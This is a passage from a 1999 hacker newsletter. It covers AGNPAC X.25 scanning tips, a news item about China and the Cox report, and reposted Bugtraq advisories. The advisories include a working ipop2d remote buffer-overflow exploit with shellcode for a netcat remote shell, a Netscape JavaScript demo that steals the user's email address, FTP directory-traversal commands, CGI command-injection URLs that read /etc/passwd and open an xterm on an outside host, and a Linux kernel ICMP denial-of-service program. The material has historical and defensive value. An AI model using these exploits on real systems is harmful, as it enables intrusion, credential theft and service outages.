  3573.       
  3574.       Some of these are used from the main prompt and some are used in conjunction
  3575.       with an NUA. Further experimentation is still forthcoming.
  3576.       
  3577.           Command   Use                           Description
  3578.           -------   ---------------------------   -------------------------------
  3579.           c                                       Closed User Group
  3580.           clr       Preceded by <ctrl>p           Used to clear a circuit locally
  3581.           f         [Restricted]                  Fast Select
  3582.           int       Preceded by <ctrl>p           ???
  3583.           l                                       Packet Size
  3584.           n         n ######### (where # is NUA)  Normal call (default)
  3585.           p         p ######### (where # is NUA)  Priority call
  3586.           par?                                    Displays parameters
  3587.           reset     Preceded by <ctrl>p           Resets locally
  3588.           set       <par>:<val> [,<par>:<val>]    Sets parameters
  3589.           stat                                    Displays statistics
  3590.       
  3591.       
  3592.       -------------------
  3593.       Scanning for NUA's
  3594.       -------------------
  3595.       
  3596.       The most important thing to know when scanning NUA's on AGNPAC is how to
  3597.       disconnect from an NUA that you have connected to and get back to the main
  3598.       prompt. This is done with the command "<ctrl>p clr". The second most
  3599.       important thing to know is that you will be disconnected from AGNPAC after
  3600.       ten failed attempts in a row. You will want to connect then disconnect from
  3601.       a known good NUA after every 8 or 9 failed attempts.
  3602.       
  3603.       
  3604.       ---------------
  3605.       Error Messages
  3606.       ---------------
  3607.       
  3608.       More often than not when scanning for NUA's you will get an error message
  3609.       rather than a call connected message. There are simply FAR more unassigned
  3610.       NUA's than there are NUA's in use. Here is a guide to error messages and
  3611.       their meanings.
  3612.       
  3613.       AGNPAC: call cleared - address not in service
  3614.       
  3615.          The most common message. It means the address is currently not assigned
  3616.          to a host system.
  3617.       
  3618.       AGNPAC: call cleared - access barred
  3619.       
  3620.          The calling terminal is not permitted to establish a connection to the
  3621.          host system. AGNPAC emits this error message on direction from the host.
  3622.          It is a system that only accepts calls from specified originating NUA's.
  3623.       
  3624.       AGNPAC: comma required before data characters
  3625.       
  3626.          This message is common when you mistype an NUA. This message may refer to
  3627.          the use of mnemonics to connect to sub-systems of the host as mentioned
  3628.          in the "System Addressing" section of this file.
  3629.       
  3630.       AGNPAC: call cleared - destination busy
  3631.       
  3632.          The host system may just be temporarily busy, permanently busy, or down.
  3633.       
  3634.       AGNPAC: call cleared - destination not responding
  3635.       
  3636.          The host is ignoring your connect request or it is down.
  3637.       
  3638.       AGNPAC: call cleared - remote directive
  3639.       
  3640.          This is likely a clearing of the virtual circuit in response to a clear
  3641.          request packet sent from the host system. The right subaddressing and/or
  3642.          mnemonics can probably get by this.
  3643.       
  3644.       AGNPAC: call cleared - local directive
  3645.       
  3646.          This message indicates that the user has used the command "<ctrl>p clr"
  3647.          to clear the virtual circuit in order to disconnect from an NUA.
  3648.       
  3649.       AGNPAC: call cleared - temporary network problem 
  3650.       
  3651.          The host system is either temporarily or permanently down.
  3652.       
  3653.       AGNPAC: invalid command
  3654.       
  3655.          Invalid command line option.
  3656.       
  3657.       AGNPAC: command not allowed 
  3658.       
  3659.          Command line option used improperly.
  3660.       
  3661.       AGNPAC: invalid packet size
  3662.       
  3663.          Command line option "l" was used in conjunction with an invalid packet
  3664.          size.
  3665.       
  3666.       AGNPAC: service option not subscribed
  3667.       
  3668.          Some NUA's result in this message. I don't know why.
  3669.       
  3670.       
  3671.       --------
  3672.       Credits
  3673.       --------
  3674.       
  3675.       Shouts to The Clone and Wizbone for helping pioneer research on this network.
  3676.       And to Deicide for the file "Introduction to Datapac" which gave me insight
  3677.       into command line options.
  3678.       
  3679.       
  3680.       
  3681.                               Copyright (c) 1999 Hack Canada
  3682.  
  3683.        @HWA
  3684.        
  3685.        
  3686.  14.0  Bomb Making Info Available, For Nukes! 
  3687.        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3688.  
  3689.        From HNN http://www.hackernews.com/    
  3690.        
  3691.               
  3692.        contributed by akeldama 
  3693.        The Chinese are claiming that the recently released Cox
  3694.        report that lambasted computer security at the
  3695.        Department of Energy and pointed the finger at China
  3696.        for stealing US Nuclear secrets was a total farce. China
  3697.        is claiming that the nuclear 'secrets' it supposedly stole
  3698.        are in fact freely available on the web, so just how
  3699.        secret can they be. Better Grab your nuclear info before
  3700.        it to disappears. 
  3701.  
  3702.        Internet News
  3703.        http://www.internetnews.com/intl-news/article/0,1087,6_129241,00.htm
  3704.        
  3705.        Federation Of American Scientists     
  3706.        http://www.fas.org/
  3707.        
  3708.        China Says Nuke Data Is On Web 
  3709.                                                                                                                  June 1, 1999
  3710.        By Hans Lombardo
  3711.        Managing Editor, asia.internet.com 
  3712.                                                                                      International News Archives 
  3713.  
  3714.  
  3715.        [Hong Kong, CHINA] In a seething attack on the Cox Report, the Chinese government yesterday declared that performance data
  3716.        on US nuclear warheads was available on the Web and in printed publications. 
  3717.  
  3718.        Zhao Qizheng, the information minister for China's State Council, told reporters in press conference that "performance data on the
  3719.        seven types of nuclear warheads--W56, W62, W70, W76, W78, W87 and W88--have long been openly published in the United
  3720.        States." 
  3721.  
  3722.        "In recent years, performance data about various types of nuclear warheads, ranging from the early MK-1 to the latest W88, can
  3723.        easily be found on the Internet," stated Zhao. 
  3724.  
  3725.        The minister demonstrated how this nuclear warhead information was easily available on the website of the Federation of American
  3726.        Scientists (FAS). 
  3727.  
  3728.        The FAS website provides users with a "Complete List of All U.S. Nuclear Weapons". 
  3729.  
  3730.        The Cox Report is the published findings of a US congressional probe lead by Republican Christopher Cox which alleges that China
  3731.        plundered nuclear weapons secrets from the United State over the last two decades. 
  3732.  
  3733.        The Beijing regime has condemned the report as a politically motivated attempt by forces in the United States to damage US-China
  3734.        relations and prevent China from developing into a economic power. 
  3735.  
  3736.        "the Chinese Government and people are strongly indignant over this groundless attack that fabricates facts and confuses black and
  3737.        white," Zhao also said about the report. 
  3738.  
  3739.        "This is a great slander against the Chinese nation and is typical racial prejudice," Zhao added. 
  3740.  
  3741.        The Chinese government has also criticized the Cox Report's suggestion it that the United States intensify control over the export of
  3742.        dual-purpose commodities and technology to China. 
  3743.  
  3744.        "It even unreasonably demands China should establish a so-called open and transparent system which enables American nationals
  3745.        designated by the United States to examine on the spot the end-users without advance notice," said Zhao. 
  3746.  
  3747.        "This is a hegemonic act that disregards China's sovereignty and violates the basic norms governing international relations." 
  3748.  
  3749.        Some local infopreneurs are concerned that a possible US backlash against the export of technologies to China will have an impact
  3750.        on China and Hong Kong's IT infrastructure development. 
  3751.  
  3752.  
  3753.        
  3754.  15.0 Exploit code for remote ipop2d security vulnerability that gives attacker a shell as user 'nobody'. 
  3755.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3756.       
  3757.       From PacketStorm http://www.genocide2600.com/~tattooman/new.shtml
  3758.       
  3759.       By c0nd0r, Sekure SDI.             
  3760.       
  3761.       
  3762.       /* 
  3763.        * Sekure SDI (Brazilian Information Security Team)
  3764.        * ipop2d remote exploit for linux (Jun, 02 1999)
  3765.        * 
  3766.        * by c0nd0r <condor@sekure.org>
  3767.        *
  3768.        *  (read the instructions below)
  3769.        *               
  3770.        *  Thanks to jamez, bahamas, dumped, bishop, slide, paranoia, stderr,
  3771.        *            falcon, vader, c_orb, marty(nordo!) and minha malinha!
  3772.        *            also to #uground (irc.brasnet.org) and #SDI (efnet),
  3773.        *            guys at el8.org, toxyn.org, pulhas.org
  3774.        *
  3775.        *  Sincere Apologizes: duke (for the mistake we made with the wu-expl), 
  3776.        *                     your code rocks.
  3777.        *
  3778.        *  Usage: 
  3779.        *
  3780.        *    SDI-pop2 <imap_server> <user> <pass> [offset]   
  3781.        *
  3782.        *   where  imap_server = IMAP server at your box (or other place as well)
  3783.        *          user = any account at your box
  3784.        *          pass = the account's password 
  3785.        *          offset = 0 is default -- increase if it's necessary.        
  3786.        *
  3787.        *  Example: (netcat rocks)
  3788.        *  
  3789.        *  (./SDI-pop ppp-666.lame.org rewt lame 0; cat) | nc lame.org 109
  3790.        *
  3791.        *  ----------------------------------------------------------------
  3792.        *  HOWTO-exploit:
  3793.        *
  3794.        *   In order to gain remote access as user nobody, you should set 
  3795.        *   an IMAP server at your box (just edit the inetd.conf) or at 
  3796.        *   any other machine which you have an account.
  3797.        *     
  3798.        *   During the anonymous_login() function, the ipop2d will set the 
  3799.        *   uid to user nobody, so you are not going to get a rootshell.
  3800.        *  ----------------------------------------------------------------
  3801.        *
  3802.        */
  3803.       
  3804.       
  3805.       #include <stdio.h>
  3806.       
  3807.       /* 
  3808.        *  (shellcode) 
  3809.        *
  3810.        *       jmp   0x1f
  3811.        *       popl  %esi
  3812.        *       movl  %esi,0x8(%esi)
  3813.        *       xorl  %eax,%eax
  3814.        *       movb  %eax,0x7(%esi)
  3815.        *       movl  %eax,0xc(%esi)
  3816.        *       movb  $0xb,%al
  3817.        *       movl  %esi,%ebx
  3818.        *       leal  0x8(%esi),%ecx
  3819.        *       leal  0xc(%esi),%edx
  3820.        *       int   $0x80
  3821.        *       xorl  %ebx,%ebx
  3822.        *       movl  %ebx,%eax
  3823.        *       inc   %eax
  3824.        *       int   $0x80
  3825.        *       call  -0x24
  3826.        *       .string \"/bin/sh\"
  3827.        * grab your shellcode generator at www.sekure.org
  3828.        */ 
  3829.       
  3830.       char c0d3[] =
  3831.               "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89"
  3832.               "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
  3833.               "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff"
  3834.               "\xff\xff/bin/sh";
  3835.       
  3836.       
  3837.       main (int argc, char *argv[] ) {
  3838.        char buf[2500];
  3839.        int x,y=1000, offset=0;
  3840.        long addr;
  3841.        char host[255], user[255], pass[255];
  3842.        int bsize=986;
  3843.        
  3844.        if ( argc < 4) {
  3845.         printf ( "Sekure SDI ipop2d remote exploit - Jun, 02 1999\n");
  3846.         printf ( "usage: 
  3847.       (SDI-pop2 <imap server> <user> <pass> [offset];cat) | nc lame.org 109\n");
  3848.         exit (0);
  3849.        }
  3850.       
  3851.        snprintf ( host, sizeof(host), "%s", argv[1]);
  3852.        snprintf ( user, sizeof(user), "%s", argv[2]);
  3853.        snprintf ( pass, sizeof(pass), "%s", argv[3]);
  3854.        
  3855.        if ( argc > 4) offset = atoi ( argv[4]);
  3856.        /* gimme the ret + offset */ 
  3857.        addr = 0xbffff3c0 + offset; 
  3858.        fprintf ( stderr, "0wning data since 0x%x\n\n", addr);
  3859.       
  3860.        /* calculation of the return address position */ 
  3861.        bsize -= strlen ( host);
  3862.       
  3863.        for ( x = 0; x < bsize-strlen(c0d3); x++) 
  3864.         buf[x] = 0x90;
  3865.       
  3866.        for ( y = 0; y < strlen(c0d3); x++, y++)
  3867.         buf[x] = c0d3[y];
  3868.       
  3869.        for (  ; x < 1012; x+=4) {
  3870.         buf[x  ] = addr & 0x000000ff;
  3871.         buf[x+1] = (addr & 0x0000ff00) >> 8;
  3872.         buf[x+2] = (addr & 0x00ff0000) >> 16;
  3873.         buf[x+3] = (addr & 0xff000000) >> 24;
  3874.        }
  3875.       
  3876.        sleep (1);
  3877.        printf ( "HELO %s:%s %s\r\n", host, user, pass);
  3878.        sleep (1);
  3879.        printf ( "FOLD %s\r\n", buf);
  3880.       
  3881.       }
  3882.       
  3883.       @HWA   
  3884.       
  3885.  16.0 Netscape Communicator 4.x "view-source:" JavaScript based security vulnerability
  3886.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3887.       
  3888.       From PacketStorm http://www.genocide2600.com/~tattooman/new.shtml
  3889.       
  3890.       Date: Tue, 1 Jun 1999 19:08:49 +0300
  3891.       From: Georgi Guninski <joro@NAT.BG>
  3892.       To: BUGTRAQ@netspace.org
  3893.       Subject: Netscape Communicator "view-source:" security vulnerabilities
  3894.       
  3895.       There is a security vulnerability in Netscape Communicator 4.6 Win95,
  3896.       4.07 Linux (probably all 4.x versions) in the way
  3897.       it works with "view-source:wysiwyg://1/javascript" URLs. It parses them
  3898.       in a "view-source" window.
  3899.       The problem is that it allows access to documents included in the parent
  3900.       document via
  3901.       ILAYER SRC="view-source:wysiwyg://1/" using find(). That allows reading
  3902.       the whole parsed document.
  3903.       
  3904.       Vulnerabilites:
  3905.       
  3906.        Browsing local directories
  3907.        Reading user's cache
  3908.        Reading parsed HTML files
  3909.        Reading Netscape's configuration ("about:config") including user's
  3910.       email address, mail servers and password.
  3911.        Probably others
  3912.       
  3913.       This vulnerability may be exploited by using HTML email message.
  3914.       
  3915.       Workaround: Disable JavaScript
  3916.       Netscape is notified about the problem.
  3917.       
  3918.       Demonstration is available at: http://www.nat.bg/~joro/viewsource.html
  3919.       
  3920.       Regards,
  3921.       Georgi Guninski
  3922.        http://www.nat.bg/~joro
  3923.        http://www.whitehats.com/guninski
  3924.           [ Part 2: "Attached Text" ]
  3925.       
  3926.           [ The following text is in the "koi8-r" character set. ]
  3927.           [ Your display is set for the "US-ASCII" character set.  ]
  3928.           [ Some characters may be displayed incorrectly. ]
  3929.       
  3930.       There is a security vulnerability in Netscape Communicator 4.6 Win95, 4.07 Linux (probably all 4.x versions) in the way it
  3931.       works with "view-source:wysiwyg://1/javascript" URLs. It parses them in a "view-source" window. The problem is that it
  3932.       allows access to documents included in the parent document via ILAYER SRC="view-source:wysiwyg://1/" using find(). That
  3933.       allows reading the whole parsed document.
  3934.       Vulnerabilites:
  3935.       
  3936.       _________________________________________________________________________________________________________________________________
  3937.       
  3938.       Browsing local directories
  3939.       Reading user's cache
  3940.       Reading parsed HTML files
  3941.       Reading Netscape's configuration ("about:config") including user's email address, mail servers and password.
  3942.       Probably others
  3943.       
  3944.       This vulnerability may be exploited by using HTML email message.
  3945.       
  3946.       _________________________________________________________________________________________________________________________________
  3947.       
  3948.       Workaround: Disable JavaScript
  3949.       
  3950.       _________________________________________________________________________________________________________________________________
  3951.       
  3952.       This demonstration tries to find your email address, it may take some time.
  3953.       
  3954.       Written by Georgi Guninski
  3955.       
  3956.       _________________________________________________________________________________________________________________________________
  3957.       
  3958.       s="view-source:wysiwyg://1/javascript:s='vvvv>&>"" +"" +" blur();msg1=\"Your email is: \";
  3959.       mend=\"general.\"+\"title_tips\";mag=\"mail.identity.useremail\"+\" = \";sp=\" \";res=mag;charstoread=50;" +"setTimeout(\"
  3960.       " +"for(i=0;i'"; //a=window.open(s); location=s;
  3961.       
  3962.       
  3963.       -----------------------------------------------------------------------------------------------------
  3964.       
  3965.       <http://www.nat.bg/~joro/viewsource.html>
  3966.       
  3967.       <HTML>
  3968.       <BODY>
  3969.       There is a security vulnerability in Netscape Communicator 4.6 Win95, 4.07 Linux (probably all 4.x versions) in the way 
  3970.       it works with "view-source:wysiwyg://1/javascript" URLs. It parses them in a "view-source" window.
  3971.       The problem is that it allows access to documents included in the parent document via 
  3972.       ILAYER SRC="view-source:wysiwyg://1/" using find(). That allows reading the whole parsed document.
  3973.       <BR>
  3974.       Vulnerabilites:
  3975.       <HR>
  3976.        Browsing local directories<BR>
  3977.        Reading user's cache<BR>
  3978.        Reading parsed HTML files<BR>
  3979.        Reading Netscape's configuration ("about:config") including user's email address, mail servers and password.<BR>
  3980.        Probably others<BR>
  3981.       <BR>
  3982.       This vulnerability may be exploited by using HTML email message.
  3983.       <HR>
  3984.       Workaround: Disable JavaScript
  3985.       <HR>
  3986.       This demonstration tries to find your email address, it may take some time.
  3987.       <BR><BR>
  3988.       <A HREF="http://www.nat.bg/~joro">Written by Georgi Guninski</A>
  3989.       <HR>
  3990.       <SCRIPT>
  3991.       
  3992.       s="view-source:wysiwyg://1/javascript:s='<TITLE>tttt</TITLE>vvvv>>"
  3993.       +"<ILAYER SRC=\"view-source:wysiwyg://1/about:config\"></ILAYER>"
  3994.       +" <SCRIPT>blur();msg1=\"Your email is: \"; mend=\"general.\"+\"title_tips\";mag=\"mail.identity.useremail\"+\" = \";sp=\" \";res=mag;charstoread=50;"
  3995.       +"setTimeout(\" "
  3996.       +"for(i=0;i<charstoread;i++) {"
  3997.       +" t=res;"
  3998.       +" find(mend);"
  3999.       +" for(c=1;c<256;c++) {"
  4000.       +"   t=res + String.fromCharCode(c);"
  4001.       +"     if (find(t,true,true)) {"
  4002.       +"      res=t;"
  4003.       +"      if (c==32) i=charstoread+1"
  4004.       +"     } "
  4005.       +" }"
  4006.       +"}"
  4007.       +"res=res.substring(mag.length);"
  4008.       +"alert(msg1 + res);"
  4009.       +" ;\",3000);</"+"SCRIPT>'";
  4010.       //a=window.open(s);
  4011.       location=s;
  4012.       
  4013.       
  4014.       </SCRIPT>
  4015.       
  4016.       @HWA
  4017.       
  4018.  17.0 Vulnerability in Broker FTP Server v. 3.0 Build 1
  4019.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4020.       
  4021.       From PacketStorm http://www.genocide2600.com/~tattooman/new.shtml    
  4022.       
  4023.  
  4024.       Date: Tue, 1 Jun 1999 07:24:24 +0200
  4025.       From: Arne Vidstrom <winnt@BAHNHOF.SE>
  4026.       To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
  4027.       Subject: Vulnerability in Broker FTP Server v. 3.0 Build 1
  4028.       
  4029.       Hi,
  4030.       
  4031.       I've found a vulnerability in Broker FTP Server v. 3.0 Build 1. Here's an
  4032.       example:
  4033.       
  4034.       You have it installed with FTP root in c:\FTProot and you have a user
  4035.       "test" with home directory in c:\FTProot\test. You also have checked the
  4036.       "Display as ROOT directory" checkbox for test, so he/she can't get below
  4037.       the home directory. CWD won't take him/here below it, but LIST will:
  4038.       
  4039.       LIST ..\..\winnt\
  4040.       
  4041.       will list the contents of c:\winnt and
  4042.       
  4043.       NLST ..\..\winnt\
  4044.       
  4045.       will also list the contents of c:\winnt. Of course this isn't as bad as if
  4046.       CWD or RETR had worked, but you probably don't want anybody to be able to
  4047.       look around in your private directories... I've contacted Transsoft about
  4048.       this, and they should have released a new version that fixed this more than
  4049.       a week ago. I've contacted them again but they haven't given me a reply
  4050.       this time.
  4051.       
  4052.       /Arne Vidstrom
  4053.       
  4054.       @HWA          
  4055.                
  4056.                
  4057.  18.0 whois_raw.cgi problem
  4058.       ~~~~~~~~~~~~~~~~~~~~~ 
  4059.  
  4060.       From PacketStorm http://www.genocide2600.com/~tattooman/new.shtml    
  4061.  
  4062.       Date: Tue, 1 Jun 1999 00:34:51 +0200
  4063.       From: Salvatore Sanfilippo -antirez- <md5330@MCLINK.IT>
  4064.       To: BUGTRAQ@netspace.org
  4065.       Subject: whois_raw.cgi problem
  4066.       
  4067.       Hi,
  4068.       
  4069.               sorry if this has already been known.
  4070.       
  4071.               There is a problem in whois_raw.cgi, called from
  4072.               whois.cgi. whois_raw.cgi is part of cdomain v1.0.
  4073.               I don't know if new versions are vulnerable.
  4074.       
  4075.       #!/usr/bin/perl
  4076.       #
  4077.       # whois_raw.cgi  Written by J. Allen Hatch (zone@berkshire.net)
  4078.       # 04/17/97
  4079.       #
  4080.       # This script is part of the cdomain v1.0 package which is available at:
  4081.       #       http://www.your-site.com/~zone/whois.html
  4082.       
  4083.       ...
  4084.       
  4085.       require ("/usr/lib/perl5/cgi-lib.pl");
  4086.       
  4087.       ...
  4088.       
  4089.       $fqdn = $in{'fqdn'};
  4090.       # Fetch the root name and concatenate
  4091.       # Fire off whois
  4092.       if ($in{'root'} eq "it") {
  4093.               @result=`$whois_cmd_it $fqdn`;
  4094.       } elsif ($in{'fqdn'} eq "alicom.com" || $in{'fqdn'} eq "alicom.org") {
  4095.               @result="Dettagli non disponibili per il dominio richiesto.";
  4096.       } else {
  4097.               @result=`$whois_cmd $fqdn`;
  4098.       }
  4099.       
  4100.       ...
  4101.       
  4102.       
  4103.               The exploit is banal and well known problem:
  4104.       
  4105.       http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
  4106.       
  4107.       http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0A/usr/X11R6/bin/xterm%20-display%20graziella.lame.org:0
  4108.       
  4109.       bye,
  4110.       antirez
  4111.       
  4112.       --
  4113.       Salvatore Sanfilippo antirez | md5330@mclink.it | antirez@alicom.com
  4114.       try hping: http://www.kyuzz.org/antirez           antirez@seclab.com
  4115.       'se la barca non ce l'hai dove uzba te ne vai?
  4116.        se la barca te la ruba, preo.'          (M. Abruscato & O. Carmeci)
  4117.       
  4118.       ---------------------------------------------------------------------------------
  4119.       
  4120.       Date: Wed, 2 Jun 1999 00:16:42 +0200
  4121.       From: Peter van Dijk <peter@ATTIC.VUURWERK.NL>
  4122.       To: BUGTRAQ@netspace.org
  4123.       Subject: Re: whois_raw.cgi problem
  4124.       
  4125.       On Tue, Jun 01, 1999 at 12:34:51AM +0200, Salvatore Sanfilippo -antirez- wrote:
  4126.       > Hi,
  4127.       >
  4128.       >       sorry if this has already been known.
  4129.       >
  4130.       >       There is a problem in whois_raw.cgi, called from
  4131.       >       whois.cgi. whois_raw.cgi is part of cdomain v1.0.
  4132.       >       I don't know if new versions are vulnerable.
  4133.       
  4134.       Version 2.0 is just as vulnerable.
  4135.       
  4136.       The commercial version (the one that runs on NT too :) is _not_ vulnerable
  4137.       since it does it's own socket thing instead of starting 'whois'.
  4138.       
  4139.       I've known of this bug in cdomain for about 6 months but never got around
  4140.       to writing up an advisory...
  4141.       
  4142.       Greetz, Peter
  4143.       --
  4144.       | 'He broke my heart,    |                              Peter van Dijk |
  4145.            I broke his neck'   |                     peter@attic.vuurwerk.nl |
  4146.          nognikz - As the sun  |        Hardbeat@ircnet - #cistron/#linux.nl |
  4147.                                | Hardbeat@undernet - #groningen/#kinkfm/#vdh |
  4148.       
  4149.       ---------------------------------------------------------------------------------
  4150.       
  4151.       Date: Wed, 2 Jun 1999 01:06:22 +0200
  4152.       From: Peter van Dijk <peter@ATTIC.VUURWERK.NL>
  4153.       To: BUGTRAQ@netspace.org
  4154.       Subject: Re: whois_raw.cgi problem
  4155.       
  4156.       On Wed, Jun 02, 1999 at 12:16:42AM +0200, Peter van Dijk wrote:
  4157.       > On Tue, Jun 01, 1999 at 12:34:51AM +0200, Salvatore Sanfilippo -antirez- wrote:
  4158.       > > Hi,
  4159.       > >
  4160.       > >     sorry if this has already been known.
  4161.       > >
  4162.       > >     There is a problem in whois_raw.cgi, called from
  4163.       > >     whois.cgi. whois_raw.cgi is part of cdomain v1.0.
  4164.       > >     I don't know if new versions are vulnerable.
  4165.       >
  4166.       > Version 2.0 is just as vulnerable.
  4167.       >
  4168.       > The commercial version (the one that runs on NT too :) is _not_ vulnerable
  4169.       > since it does it's own socket thing instead of starting 'whois'.
  4170.       >
  4171.       > I've known of this bug in cdomain for about 6 months but never got around
  4172.       > to writing up an advisory...
  4173.       
  4174.       To elaborate this a bit further: cdomain-free 2.4 and lower are
  4175.       _vulnerable_. cdomain-free 2.5 and all commercial cdomain versions I've
  4176.       seen are _not_ vulnerable, because they connect to the whois servers
  4177.       themselves.
  4178.       
  4179.       cdomain-free is available for download at www.cdomain.com.
  4180.       
  4181.       Greetz, Peter
  4182.       --
  4183.       | 'He broke my heart,    |                              Peter van Dijk |
  4184.            I broke his neck'   |                     peter@attic.vuurwerk.nl |
  4185.          nognikz - As the sun  |        Hardbeat@ircnet - #cistron/#linux.nl |
  4186.                                | Hardbeat@undernet - #groningen/#kinkfm/#vdh |
  4187.       
  4188.       @HWA
  4189.       
  4190.  19.0 Linux kernel 2.2.x vulnerability/exploit
  4191.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
  4192.  
  4193.  
  4194.       From PacketStorm http://www.genocide2600.com/~tattooman/new.shtml    
  4195.  
  4196.       Date: Tue, 1 Jun 1999 17:43:17 +0200
  4197.       From: Piotr Wilkin <pwl@WOTAN.2SLO.WAW.PL>
  4198.       To: BUGTRAQ@netspace.org
  4199.       Subject: Linux kernel 2.2.x vulnerability/exploit
  4200.       
  4201.       I'm sorry if this has been noticed before, but since I did't find anything
  4202.       in the archives, I post it here.
  4203.       There seems to be a bug in kernels 2.2.x (tested on 2.2.7 and 2.2.9), that
  4204.       causes them to panic when they are sent a large number of specific ICMP
  4205.       packages. I think the problem comes from the combination of the mangled
  4206.       header length (shorter or longer ihl's don't cause hangup) and the random
  4207.       ICMP packets (random type/subtype and source address) this program sends.
  4208.       Windows 9x and FreeBSD 3.0 seem to be unaffected.
  4209.       
  4210.       
  4211.       -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  4212.       
  4213.       Here is the program source (under Linux):
  4214.       
  4215.       -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  4216.       
  4217.       #include <stdio.h>
  4218.       #include <stdlib.h>
  4219.       #include <string.h>
  4220.       #include <sys/types.h>
  4221.       #include <sys/socket.h>
  4222.       #include <netinet/in.h>
  4223.       #include <netinet/ip.h>
  4224.       #include <netinet/ip_icmp.h>
  4225.       #include <arpa/inet.h>
  4226.       #include <errno.h>
  4227.       #include <unistd.h>
  4228.       #include <netdb.h>
  4229.       
  4230.       struct icmp_hdr
  4231.       {
  4232.           struct iphdr iph;
  4233.           struct icmp icp;
  4234.           char text[1002];
  4235.       } icmph;
  4236.       
  4237.       int in_cksum(int *ptr, int nbytes)
  4238.       {
  4239.           long sum;
  4240.           u_short oddbyte, answer;
  4241.           sum = 0;
  4242.           while (nbytes > 1)
  4243.           {
  4244.               sum += *ptr++;
  4245.               nbytes -= 2;
  4246.           }
  4247.           if (nbytes == 1)
  4248.           {
  4249.               oddbyte = 0;
  4250.               *((u_char *)&oddbyte) = *(u_char *)ptr;
  4251.               sum += oddbyte;
  4252.           }
  4253.           sum = (sum >> 16) + (sum & 0xffff);
  4254.           sum += (sum >> 16);
  4255.           answer = ~sum;
  4256.           return(answer);
  4257.       }
  4258.       
  4259.       struct sockaddr_in sock_open(char *address, int socket, int prt)
  4260.       {
  4261.               struct hostent *host;
  4262.               if ((host = gethostbyname(address)) == NULL)
  4263.               {
  4264.                       perror("Unable to get host name");
  4265.                       exit(-1);
  4266.               }       
  4267.               struct sockaddr_in sin;
  4268.               bzero((char *)&sin, sizeof(sin));
  4269.               sin.sin_family = PF_INET;
  4270.               sin.sin_port = htons(prt);
  4271.               bcopy(host->h_addr, (char *)&sin.sin_addr, host->h_length);
  4272.               return(sin);
  4273.       }
  4274.       
  4275.       void main(int argc, char **argv)
  4276.       {
  4277.               int sock, i, ctr, k;
  4278.               int on = 1;
  4279.               struct sockaddr_in addrs;
  4280.               if (argc < 3)
  4281.               {
  4282.                       printf("Usage: %s <ip_addr> <port>\n", argv[0]);
  4283.                       exit(-1);
  4284.               }
  4285.               for (i = 0; i < 1002; i++)
  4286.               {
  4287.                   icmph.text[i] = random() % 255;
  4288.               }
  4289.               sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
  4290.               if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == -1)
  4291.               {
  4292.                   perror("Can't set IP_HDRINCL option on socket");
  4293.               }
  4294.               if (sock < 0)
  4295.               {
  4296.                   exit(-1);
  4297.               }
  4298.               fflush(stdout);
  4299.               for (ctr = 0;ctr < 1001;ctr++)
  4300.               {
  4301.                   ctr = ctr % 1000;
  4302.                   addrs = sock_open(argv[1], sock, atoi(argv[2]));
  4303.                   icmph.iph.version = 4;
  4304.                   icmph.iph.ihl = 6;
  4305.                   icmph.iph.tot_len = 1024;
  4306.                   icmph.iph.id = htons(0x001);
  4307.                   icmph.iph.ttl = 255;
  4308.                   icmph.iph.protocol = IPPROTO_ICMP;
  4309.                   icmph.iph.saddr = ((random() % 255) * 255 * 255 * 255) +
  4310.                   ((random() % 255) * 65535) +
  4311.                   ((random() % 255) * 255) +
  4312.                   (random() % 255);
  4313.                   icmph.iph.daddr = addrs.sin_addr.s_addr;
  4314.                   icmph.iph.frag_off = htons(0);
  4315.                   icmph.icp.icmp_type = random() % 14;
  4316.                   icmph.icp.icmp_code = random() % 10;
  4317.                   icmph.icp.icmp_cksum = 0;
  4318.                   icmph.icp.icmp_id = 2650;
  4319.                   icmph.icp.icmp_seq = random() % 255;
  4320.                   icmph.icp.icmp_cksum = in_cksum((int *)&icmph.icp, 1024);
  4321.                   if (sendto(sock, &icmph, 1024, 0, (struct sockaddr *)&addrs, sizeof(struct sockaddr)) == -1)
  4322.                   {
  4323.                       if (errno != ENOBUFS) printf("X");
  4324.                   }
  4325.                   if (ctr == 0) printf("b00m ");
  4326.                   fflush(stdout);
  4327.               }
  4328.               close(sock);
  4329.       }
  4330.       
  4331.       --------------------------------------------------------------------------------
  4332.       
  4333.       Date: Tue, 1 Jun 1999 23:30:33 +0100
  4334.       From: Alan Cox <alan@LXORGUK.UKUU.ORG.UK>
  4335.       To: BUGTRAQ@netspace.org
  4336.       Subject: Linux 2.2 DoS attack
  4337.       
  4338.       Ok problem confirmed. Its not icmp however - in fact the program given
  4339.       has some bugs that cause it. If it had been a correctly written icmp tester
  4340.       it wouldnt have worked. A blessing in disguise.
  4341.       
  4342.       Anyway the fix seems to be this. Sorry it took so long to sort out.
  4343.       
  4344.       
  4345.       --- ../linux.vanilla/net/ipv4/ip_options.c      Wed May 12 16:49:38 1999
  4346.       +++ net/ipv4/ip_options.c       Tue Jun  1 22:11:46 1999
  4347.       @@ -452,7 +452,6 @@
  4348.        error:
  4349.               if (skb) {
  4350.                       icmp_send(skb, ICMP_PARAMETERPROB, 0, htonl((pp_ptr-iph)<<24));
  4351.       -               kfree_skb(skb);
  4352.               }
  4353.               return -EINVAL;
  4354.        }
